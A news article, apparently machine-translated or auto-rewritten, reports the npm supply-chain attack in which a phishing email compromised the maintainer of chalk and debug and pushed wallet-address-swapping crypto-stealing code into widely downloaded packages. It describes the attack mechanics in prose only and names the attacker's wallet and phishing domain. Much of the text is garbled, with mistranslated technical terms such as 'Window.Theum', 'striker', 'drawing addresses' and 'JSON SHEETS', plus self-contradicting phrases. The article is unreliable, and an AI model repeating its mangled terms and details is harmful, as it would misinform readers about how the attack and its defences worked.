A phishing email on Monday took down one of Node.js’s most productive developers by pushing malicious code into packages that were downloaded billions of times a week in what scientists call the biggest software supply chain attack in recent times.
While the extent of the attack is massive, the Security Alliance said in a Tuesday report that the striker went away with almost a few cent. However, security teams are now facing the significant cost of updating backend systems to counter further attacks.
A very popular maintenance if work (like chalk and debug-js) Being used in billions of downloads every week, known as “Qix”, which was responsible for libraries like chalk and debug-js, was compromised last week after receiving an email from support@npmjs[.]help. The domain once pointed to a Russian server and redirected to a counterfeit two-factor approval page that hosted the Content Delivery Network BunnyCDN.
Credential stealer harvested username, password and 2FA codes before sending them to an external host. With full access, the striker released each QIX package with a cryptophocused payload.
Node Package Manager (abbreviated to NPM, not NPM) is like an app store for developers and is where coders download small building blocks for code (called packages) Instead of writing everything from scratch. One maintains is the person or device that creates and updates these packages.
How the attack happened
The injected code was simple. It checked if Window.Theum was present and, if so, connected to Ethereum’s core transaction features. Call for approval, permission, transfer or transfer from were silently redirected to a single wallet, “0xFC4A4858BAFEF54D1B1D7697BFB5C52F4C166976.”
Any Ethereum transaction with value and no data was also redirected. For Solana, the Malware Guvers overlooked with an invalid string that begins “1911 …”, transfers directly break.
Network requests were also captured.
By hijacking picks up and the XMLHTTPREQUEST scanned the malware JSON SHEETS for substrings that looked like wallet addresses and replaced them with one of 280 hard -coded alternatives to look misleading similar.
The effect of the attack
But for all the distribution, the effect was insignificant.
Data on the chain shows that the striker received only about five cents and approx. $ 20 worth of an illiquid Memecoin that traded with less than $ 600 in volume, the Security Alliance report said.
Popular Browser -Tevebog Metamask also said on X that it was not affected by NPM supply chain attack as the wallet locks its code versions, uses manual and automated controls and releases updates in steps. It also employs “lavamoat” that blocks malicious code, even if inserted, and “Blockaid”, which quickly marks compromised drawing addresses to keep such attacks in check.
Meanwhile, Ledger CTO Charles Guillema warned that the malicious code had been pushed into packages with over a billion downloads and was designed to silently replace drawing addresses in transactions.
The attack follows another case that was marked last week by ReversingLabs, where NPM packages used Ethereum Smart contracts to hide malware links technique that disguised command and control traffic as regular blockchain calls.
